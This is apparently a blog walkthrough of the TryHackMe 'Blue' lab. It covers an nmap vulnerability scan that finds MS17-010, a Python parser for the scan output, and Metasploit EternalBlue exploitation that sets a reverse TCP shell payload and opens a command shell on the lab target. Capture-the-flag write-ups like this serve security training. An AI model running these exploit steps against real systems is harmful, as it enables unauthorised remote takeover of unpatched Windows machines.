progrez.cloud

Blue - Tryhackme =} Part 1 | Windows | Easy

1 March 2021

Blue


Deploy and hack into a Windows machine, leveraging common misconfiguration issues.


Task 1 # Recon


Scan and learn what this machine is vulnerable to. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot. This room is not meant to be a boot2root CTF; rather, it is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice, as the process here is meant to focus on beginners.


Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room.)


How many ports are open with a port number under 1000?



Run a port scan and see how many open ports there are below 1000.

┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sV -vv --script vuln 10.10.217.244 
[sudo] password for cyber: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 13:21 WIT
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 10.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 0.00s elapsed
Initiating Ping Scan at 13:21
Scanning 10.10.217.244 [4 ports]
Completed Ping Scan at 13:21, 0.48s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:21
Completed Parallel DNS resolution of 1 host. at 13:22, 13.00s elapsed
Initiating SYN Stealth Scan at 13:22
Scanning 10.10.217.244 [1000 ports]
Discovered open port 445/tcp on 10.10.217.244
Discovered open port 3389/tcp on 10.10.217.244
Discovered open port 139/tcp on 10.10.217.244
Discovered open port 135/tcp on 10.10.217.244
Discovered open port 49153/tcp on 10.10.217.244
Increasing send delay for 10.10.217.244 from 0 to 5 due to 52 out of 171 dropped probes since last increase.
Discovered open port 49152/tcp on 10.10.217.244
Discovered open port 49160/tcp on 10.10.217.244
Discovered open port 49158/tcp on 10.10.217.244
Discovered open port 49154/tcp on 10.10.217.244
Increasing send delay for 10.10.217.244 from 5 to 10 due to max_successful_tryno increase to 4
Completed SYN Stealth Scan at 13:22, 47.00s elapsed (1000 total ports)
Initiating Service scan at 13:22
Scanning 9 services on 10.10.217.244
Service scan Timing: About 55.56% done; ETC: 13:24 (0:00:47 remaining)
Completed Service scan at 13:23, 65.16s elapsed (9 services on 1 host)
NSE: Script scanning 10.10.217.244.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:23
NSE Timing: About 99.91% done; ETC: 13:24 (0:00:00 remaining)
Completed NSE at 13:24, 31.93s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:24
NSE: [ssl-ccs-injection 10.10.217.244:3389] No response from server: ERROR
Completed NSE at 13:24, 10.30s elapsed
Nmap scan report for 10.10.217.244
Host is up, received echo-reply ttl 127 (0.30s latency).
Scanned at 2021-03-01 13:21:47 WIT for 168s
Not shown: 991 closed ports
Reason: 991 resets
PORT     STATE SERVICE           REASON         VERSION
135/tcp  open msrpc             syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open microsoft-ds      syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 127
| rdp-vuln-ms12-020: 
|  VULNERABLE:
|  MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|    State: VULNERABLE
|    IDs: CVE:CVE-2012-0152
|    Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|          Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|          
|    Disclosure date: 2012-03-13
|    References:
|      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|  
|  MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|    State: VULNERABLE
|    IDs: CVE:CVE-2012-0002
|    Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|          Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|          
|    Disclosure date: 2012-03-13
|    References:
|      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
49152/tcp open msrpc             syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc             syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc             syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open msrpc             syn-ack ttl 127 Microsoft Windows RPC
49160/tcp open msrpc             syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|  VULNERABLE:
|  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|    State: VULNERABLE
|    IDs: CVE:CVE-2017-0143
|    Risk factor: HIGH
|      A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|          
|    Disclosure date: 2017-03-14
|    References:
|      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_     https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 180.34 seconds
          Raw packets sent: 1681 (73.940KB) | Rcvd: 1103 (44.144KB)

From the scan above, the open ports below 1000 are 135, 139 and 445.

So the number of open ports below 1000 is 3.

Answer = 3


What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)


From the scan above we can see what the machine is vulnerable to, in the same form as the example ms08-067:

Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

Answer = ms17-010
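Both recon answers can be pulled straight out of the nmap report instead of being counted by eye. The following Python script is an added example and is not part of this write-up or of the TryHackMe room; it parses nmap's normal-format output, counts the open ports below a limit, and lists only the NSE scripts that reported `VULNERABLE:` together with the CVE ids and MS bulletin numbers mentioned in their output. The embedded report is a constructed, abridged copy of the scan shown above (same ports and NSE results, verbose timing lines dropped); the function names are my own.

```python
import re
from collections import OrderedDict

# Constructed sample: an abridged copy of the nmap report from the scan above.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.217.244
Host is up, received echo-reply ttl 127 (0.30s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE           REASON         VERSION
135/tcp  open msrpc             syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open microsoft-ds      syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 127
| rdp-vuln-ms12-020: 
|  VULNERABLE:
|  MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|    State: VULNERABLE
|    IDs: CVE:CVE-2012-0152
|  MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|    State: VULNERABLE
|    IDs: CVE:CVE-2012-0002
|_     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open msrpc             syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc             syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|  VULNERABLE:
|  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|    State: VULNERABLE
|    IDs: CVE:CVE-2017-0143
|    Risk factor: HIGH
|_     https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""

# One row of nmap's port table: "445/tcp  open microsoft-ds ..."
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\w+)\s+(?P<service>\S+)")
# Start of an NSE script's output: "| name: " (multi-line) or "|_name: value" (single line).
SCRIPT_HDR_RE = re.compile(r"^\|[ _](?P<name>[A-Za-z0-9_-]+):")
CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b")
BULLETIN_RE = re.compile(r"\b(ms\d{2}-\d{3})\b", re.IGNORECASE)


def parse_open_ports(report):
    """Return (port, protocol, service) for every row of the port table whose state is open."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m and m.group("state") == "open":
            ports.append((int(m.group("port")), m.group("proto"), m.group("service")))
    return ports


def count_open_ports_below(report, limit=1000):
    """Answer to 'how many open ports under <limit>'."""
    return sum(1 for port, _, _ in parse_open_ports(report) if port < limit)


def parse_script_blocks(report):
    """Group the '|'-prefixed NSE lines by script name, in order of appearance."""
    blocks = OrderedDict()
    current = None
    for line in report.splitlines():
        if not line.startswith("|"):
            current = None          # any non-script line ends the current block
            continue
        m = SCRIPT_HDR_RE.match(line)
        if m:
            current = m.group("name")
            blocks.setdefault(current, [])
        if current is not None:
            blocks[current].append(line)
    return blocks


def vulnerable_findings(report):
    """Return {script: {"cves": [...], "bulletins": [...]}} for scripts that printed 'VULNERABLE:'."""
    findings = OrderedDict()
    for name, lines in parse_script_blocks(report).items():
        body = [line.lstrip("|_ ").rstrip() for line in lines]
        if "VULNERABLE:" not in body:
            continue                # e.g. "smb-vuln-ms10-054: false" is not a finding
        text = "\n".join(lines)
        cves = list(dict.fromkeys(CVE_RE.findall(text)))
        bulletins = list(dict.fromkeys(b.lower() for b in BULLETIN_RE.findall(text)))
        findings[name] = {"cves": cves, "bulletins": bulletins}
    return findings


if __name__ == "__main__":
    print("open ports below 1000:", count_open_ports_below(SAMPLE_REPORT))
    for script, info in vulnerable_findings(SAMPLE_REPORT).items():
        print(f"{script}: bulletins={info['bulletins']} cves={info['cves']}")
```

Running it against the sample gives 3 open ports below 1000 and two findings, `rdp-vuln-ms12-020` (ms12-020) and `smb-vuln-ms17-010` (ms17-010); the scripts that answered `false` or `NT_STATUS_ACCESS_DENIED` are correctly left out, which is the distinction that matters when triaging a larger scan.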


Task 2 # Gain Access


Exploit the machine and gain a foothold.

Start Metasploit


Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)


Open Metasploit and search for a module that can exploit a machine vulnerable to ms17-010.

┌─[cyber@cyber]─[~]
└──╼ $sudo msfconsole
[sudo] password for cyber: 


                _---------.
            .' #######  ;."
 .---,.   ;@            @@`;  .---,..
." @@@@@'.,'@@           @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@         @@@@@@@@@@@@@ @;
  `.@@@@@@@@@@@@       @@@@@@@@@@@@@@ .'
    "--'.@@@ -.@       @ ,'-  .'--"
         ".@' ; @      @ `. ;'
           |@@@@ @@@    @   .
            ' @@@ @@  @@   ,
             `.@@@@   @@  .
               ',@@    @  ;          _____________
                (  3 C   )    /|___ / Metasploit! 
                ;@'. __*__,."   |--- \_____________/
                 '(.,...."/


      =[ metasploit v6.0.16-dev                         ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post      ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops           ]
+ -- --=[ 7 evasion                                      ]

Metasploit tip: Enable verbose logging with set VERBOSE true

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 > search ms17-010

Matching Modules
================

  # Name                                          Disclosure Date Rank    Check Description
  - ----                                          --------------- ----    ----- -----------
  0 auxiliary/admin/smb/ms17_010_command          2017-03-14      normal  No    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
  1 auxiliary/scanner/smb/smb_ms17_010                             normal  No    MS17-010 SMB RCE Detection
  2 exploit/windows/smb/ms17_010_eternalblue      2017-03-14      average Yes   MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
  3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14      average No    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
  4 exploit/windows/smb/ms17_010_psexec           2017-03-14      normal  Yes   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
  5 exploit/windows/smb/smb_doublepulsar_rce      2017-04-14      great   Yes   SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

The search has turned up the module for exploiting this ms17-010 machine:

2 exploit/windows/smb/ms17_010_eternalblue      2017-03-14      average Yes   MS17-010 EternalBlue SMB Remote Windows 

Answer = exploit/windows/smb/ms17_010_eternalblue


Show options and set the one required value. What is the name of this value? (All caps for submission)


Run the command to list the targets:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

  Id Name
  -- ----
  0  Windows 7 and Server 2008 R2 (x64) All Service Packs

Run the command to list the options:

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

  Name          Current Setting Required Description
  ----          --------------- -------- -----------
  RHOSTS                         yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         445             yes      The target port (TCP)
  SMBDomain     .               no       (Optional) The Windows domain to use for authentication
  SMBPass                        no       (Optional) The password for the specified username
  SMBUser                        no       (Optional) The username to authenticate as
  VERIFY_ARCH   true            yes      Check if remote architecture matches exploit Target.
  VERIFY_TARGET true            yes      Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):
 
  Name     Current Setting Required Description
  ----     --------------- -------- -----------
  EXITFUNC thread          yes      Exit technique (Accepted: '', seh, thread, process, none)
  LHOST    192.168.1.14    yes      The listen address (an interface may be specified)
  LPORT    4444            yes      The listen port


Exploit target:

  Id Name
  -- ----
  0  Windows 7 and Server 2008 R2 (x64) All Service Packs

Run the command to set the target IP:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.217.244
RHOSTS => 10.10.217.244
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):
 
  Name          Current Setting Required Description
  ----          --------------- -------- -----------
  RHOSTS        10.10.217.244   yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         445             yes      The target port (TCP)
  SMBDomain     .               no       (Optional) The Windows domain to use for authentication
  SMBPass                        no       (Optional) The password for the specified username
  SMBUser                        no       (Optional) The username to authenticate as
  VERIFY_ARCH   true            yes      Check if remote architecture matches exploit Target.
  VERIFY_TARGET true            yes      Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

  Name     Current Setting Required Description
  ----     --------------- -------- -----------
  EXITFUNC thread          yes      Exit technique (Accepted: '', seh, thread, process, none)
  LHOST    192.168.1.14    yes      The listen address (an interface may be specified)
  LPORT    4444            yes      The listen port


Exploit target:

  Id Name
  -- ----
  0  Windows 7 and Server 2008 R2 (x64) All Service Packs

Answer = RHOSTS


Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp


Run the following command:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

  Name          Current Setting Required Description
  ----          --------------- -------- -----------
  RHOSTS        10.10.217.244   yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         445             yes      The target port (TCP)
  SMBDomain     .               no       (Optional) The Windows domain to use for authentication
  SMBPass                        no       (Optional) The password for the specified username
  SMBUser                        no       (Optional) The username to authenticate as
  VERIFY_ARCH   true            yes      Check if remote architecture matches exploit Target.
  VERIFY_TARGET true            yes      Check if remote OS matches exploit Target.


Payload options (windows/x64/shell/reverse_tcp):

  Name     Current Setting Required Description
  ----     --------------- -------- -----------
  EXITFUNC thread          yes      Exit technique (Accepted: '', seh, thread, process, none)
  LHOST    192.168.1.14    yes      The listen address (an interface may be specified)
  LPORT    4444            yes      The listen port


Exploit target:

  Id Name
  -- ----
  0  Windows 7 and Server 2008 R2 (x64) All Service Packs

Set LHOST for the reverse handler to the IP of the tun0 tunnel interface, which is brought up in the terminal by the OpenVPN connection to TryHackMe:

┌─[cyber@cyber]─[~]
└──╼ $ifconfig 
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
       inet 10.9.169.148 netmask 255.255.0.0 destination 10.9.169.148
       inet6 fe80::4bd4:3af2:b172:9b5 prefixlen 64 scopeid 0x20<link>
       unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
       RX packets 2174 bytes 125662 (122.7 KiB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 3222 bytes 676629 (660.7 KiB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Run the following command:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.9.169.148
lhost => 10.9.169.148
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

  Name          Current Setting Required Description
  ----          --------------- -------- -----------
  RHOSTS        10.10.217.244   yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         445             yes      The target port (TCP)
  SMBDomain     .               no       (Optional) The Windows domain to use for authentication
  SMBPass                        no       (Optional) The password for the specified username
  SMBUser                        no       (Optional) The username to authenticate as
  VERIFY_ARCH   true            yes      Check if remote architecture matches exploit Target.
  VERIFY_TARGET true            yes      Check if remote OS matches exploit Target.


Payload options (windows/x64/shell/reverse_tcp):

  Name     Current Setting Required Description
  ----     --------------- -------- -----------
  EXITFUNC thread          yes      Exit technique (Accepted: '', seh, thread, process, none)
  LHOST    10.9.169.148    yes      The listen address (an interface may be specified)
  LPORT    4444            yes      The listen port


Exploit target:

  Id Name
  -- ----
  0  Windows 7 and Server 2008 R2 (x64) All Service Packs


Once that is done, run the exploit!


Run the exploit:

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
 
[*] Started reverse TCP handler on 10.9.169.148:4444 
[*] 10.10.217.244:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.217.244:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.217.244:445    - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.217.244:445 - Connecting to target for exploitation.
[+] 10.10.217.244:445 - Connection established for exploitation.
[+] 10.10.217.244:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.217.244:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.217.244:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.217.244:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.217.244:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31                   ice Pack 1     
[+] 10.10.217.244:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.217.244:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.217.244:445 - Sending all but last fragment of exploit packet
[*] 10.10.217.244:445 - Starting non-paged pool grooming
[+] 10.10.217.244:445 - Sending SMBv2 buffers
[+] 10.10.217.244:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.217.244:445 - Sending final SMBv2 buffers.
[*] 10.10.217.244:445 - Sending last fragment of exploit packet!
[*] 10.10.217.244:445 - Receiving response from exploit packet
[+] 10.10.217.244:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.217.244:445 - Sending egg to corrupted connection.
[*] 10.10.217.244:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.217.244
[*] Command shell session 2 opened (10.9.169.148:4444 -> 10.10.217.244:49256) at 2021-03-01 14:27:47 +0900
[+] 10.10.217.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.217.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.217.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

We have broken into the target system and taken control of it.


Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.


Task 3 # Escalate


Escalate privileges, learn how to upgrade shells in Metasploit.


If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to a meterpreter shell in Metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)